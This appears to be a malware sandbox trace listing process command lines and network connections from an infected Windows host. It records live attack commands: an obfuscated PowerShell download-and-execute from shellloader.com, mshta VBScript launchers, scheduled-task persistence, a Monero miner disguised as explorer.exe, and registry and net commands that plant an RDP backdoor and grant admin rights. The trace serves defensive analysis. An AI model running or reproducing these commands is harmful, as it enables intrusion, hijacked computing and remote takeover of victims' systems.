C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 908

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 900

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im Sat19e6a852f849bb2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS062F51C4\Sat19e6a852f849bb2.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im Sat19e6a852f849bb2.exe /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\2110516.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\2110516.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2712 -s 1952

C:\Users\Admin\AppData\Local\Temp\is-D9E1S.tmp\postback.exe

"C:\Users\Admin\AppData\Local\Temp\is-D9E1S.tmp\postback.exe" ss1

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\5651654.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\5651654.exe") do taskkill -Im "%~nxl" /F

C:\Program Files\MSBuild\NUKMIWBYRX\ultramediaburner.exe

"C:\Program Files\MSBuild\NUKMIWBYRX\ultramediaburner.exe" /VERYSILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\2110516.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\2110516.exe") do taskkill -Im "%~nxl" /F

C:\Users\Admin\AppData\Local\Temp\is-DKOK5.tmp\ultramediaburner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DKOK5.tmp\ultramediaburner.tmp" /SL5="$1034E,281924,62464,C:\Program Files\MSBuild\NUKMIWBYRX\ultramediaburner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\42-72a2b-82f-4be9c-46d7cc66408df\Lujisisidae.exe

"C:\Users\Admin\AppData\Local\Temp\42-72a2b-82f-4be9c-46d7cc66408df\Lujisisidae.exe"

C:\Users\Admin\AppData\Local\Temp\40-3f9f7-1c3-4b9b6-c9a45ef328b90\Xafaevushyme.exe

"C:\Users\Admin\AppData\Local\Temp\40-3f9f7-1c3-4b9b6-c9a45ef328b90\Xafaevushyme.exe"

C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE

C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe

"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "5651654.exe" /F

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "2110516.exe" /F

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Windows\SysWOW64\explorer.exe

explorer.exe ss1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "== "" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\44qkxlxz.pmh\GcleanerEU.exe /eufive & exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ymf0n1il.dtq\installer.exe /qn CAMPAIGN="654" & exit

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"

C:\Users\Admin\AppData\Local\Temp\44qkxlxz.pmh\GcleanerEU.exe

C:\Users\Admin\AppData\Local\Temp\44qkxlxz.pmh\GcleanerEU.exe /eufive

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Users\Admin\AppData\Local\Temp\ymf0n1il.dtq\installer.exe

C:\Users\Admin\AppData\Local\Temp\ymf0n1il.dtq\installer.exe /qn CAMPAIGN="654"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1zjetqv2.51k\anyname.exe & exit

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rdhcu2sn.5ph\gcleaner.exe /mixfive & exit

C:\Users\Admin\AppData\Local\Temp\1zjetqv2.51k\anyname.exe

C:\Users\Admin\AppData\Local\Temp\1zjetqv2.51k\anyname.exe

C:\Users\Admin\AppData\Local\Temp\rdhcu2sn.5ph\gcleaner.exe

C:\Users\Admin\AppData\Local\Temp\rdhcu2sn.5ph\gcleaner.exe /mixfive

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u5jj5q14.k0w\autosubplayer.exe /S & exit

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Users\Admin\AppData\Local\Temp\KPzSScVqZ.exe

"C:\Users\Admin\AppData\Local\Temp\KPzSScVqZ.exe"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding C5910DB299B7190FFD1C3670E0E8F92D C

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\ProgramData\EMGKK6Y07HFVSXJ4.exe

"C:\ProgramData\EMGKK6Y07HFVSXJ4.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im KPzSScVqZ.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\KPzSScVqZ.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im KPzSScVqZ.exe /f

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ymf0n1il.dtq\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ymf0n1il.dtq\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631140831 /qn CAMPAIGN=""654"" " CAMPAIGN="654"

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 3B46C6539A66CCC20D1B8F3D3C461B49

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Users\Admin\AppData\Local\Temp\EA22.exe

C:\Users\Admin\AppData\Local\Temp\EA22.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Local\Temp\FAFC.exe

C:\Users\Admin\AppData\Local\Temp\FAFC.exe

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 0687A71706DF56C052F054376F64354D E Global\MSI0000

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vgrzfacs\vgrzfacs.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES607.tmp" "c:\Users\Admin\AppData\Local\Temp\vgrzfacs\CSC913567B470AF4A1F90C2B6DDCAD36B2E.TMP"

C:\Users\Admin\AppData\Local\Temp\l70tT9AqV.exe

"C:\Users\Admin\AppData\Local\Temp\l70tT9AqV.exe"

C:\Users\Admin\AppData\Local\Temp\13E4.exe

C:\Users\Admin\AppData\Local\Temp\13E4.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im FAFC.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\FAFC.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im FAFC.exe /f

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\13E4.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\etgxz0pl\etgxz0pl.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6BF5.tmp" "c:\Users\Admin\AppData\Local\Temp\etgxz0pl\CSCE85483E63CB44A328F3650F9D46C7039.TMP"

C:\Users\Admin\AppData\Local\Temp\DniSJJFfB.exe

"C:\Users\Admin\AppData\Local\Temp\DniSJJFfB.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0aizfolg\0aizfolg.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE56A.tmp" "c:\Users\Admin\AppData\Local\Temp\0aizfolg\CSC69B9ACF47C6844E4B155A29A39EDE98.TMP"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T /R

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\SysWOW64\cmd.exe

cmd /c net start rdpdr

C:\Windows\SysWOW64\net.exe

net start rdpdr

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\SysWOW64\cmd.exe

cmd /c net start rdpdr

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\SysWOW64\net.exe

net start rdpdr

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\SysWOW64\cmd.exe

cmd /c net start TermService

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\SysWOW64\cmd.exe

cmd /c net start TermService

C:\Windows\SysWOW64\net.exe

net start TermService

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\SysWOW64\net.exe

net start TermService

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\SysWOW64\cmd.exe

cmd /c net start rdpdr

C:\Windows\SysWOW64\net.exe

net start rdpdr

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\SysWOW64\cmd.exe

cmd /c net start TermService

C:\Windows\SysWOW64\net.exe

net start TermService

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\slui.exe

C:\Windows\System32\slui.exe -Embedding

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Roaming\vhsgwrt

C:\Users\Admin\AppData\Roaming\vhsgwrt

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Roaming\vhsgwrt

C:\Users\Admin\AppData\Roaming\vhsgwrt

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Roaming\vhsgwrt

C:\Users\Admin\AppData\Roaming\vhsgwrt

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 hsiens.xyz udp
US 172.67.142.91:80 hsiens.xyz tcp
US 8.8.8.8:53 ip-api.com udp
N/A 127.0.0.1:56793 tcp
N/A 127.0.0.1:56796 tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 a.goatgame.co udp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 startupmart.bar udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 172.67.146.70:443 a.goatgame.co tcp
US 144.202.76.47:443 www.listincode.com tcp
US 104.21.37.182:443 startupmart.bar tcp
US 8.8.8.8:53 safialinks.com udp
US 162.0.213.132:80 safialinks.com tcp
US 8.8.8.8:53 statuse.digitalcertvalidation.com udp
US 72.21.91.29:80 statuse.digitalcertvalidation.com tcp
US 8.8.8.8:53 wheelllc.bar udp
US 172.67.136.53:443 wheelllc.bar tcp
US 8.8.8.8:53 iplogger.org udp
DE 88.99.66.31:443 iplogger.org tcp
US 8.8.8.8:53 gheorghip.tumblr.com udp
US 74.114.154.18:443 gheorghip.tumblr.com tcp
US 8.8.8.8:53 qwertys.info udp
DE 88.99.66.31:443 iplogger.org tcp
DE 162.55.179.90:80 162.55.179.90 tcp
US 8.8.8.8:53 iplogger.com udp
DE 88.99.66.31:443 iplogger.com tcp
US 104.21.20.198:443 qwertys.info tcp
US 8.8.8.8:53 yelty.info udp
US 104.21.17.186:443 yelty.info tcp
US 8.8.8.8:53 www.iyiqian.com udp
RU 103.155.92.58:80 www.iyiqian.com tcp
US 8.8.8.8:53 www.mhmvc.xyz udp
RU 188.225.87.175:80 www.mhmvc.xyz tcp
SC 185.215.113.104:18754 tcp
US 104.21.37.182:443 startupmart.bar tcp
US 208.95.112.1:80 ip-api.com tcp
DE 88.99.66.31:443 iplogger.com tcp
US 8.8.8.8:53 phonefix.bar udp
US 104.21.10.67:443 phonefix.bar tcp
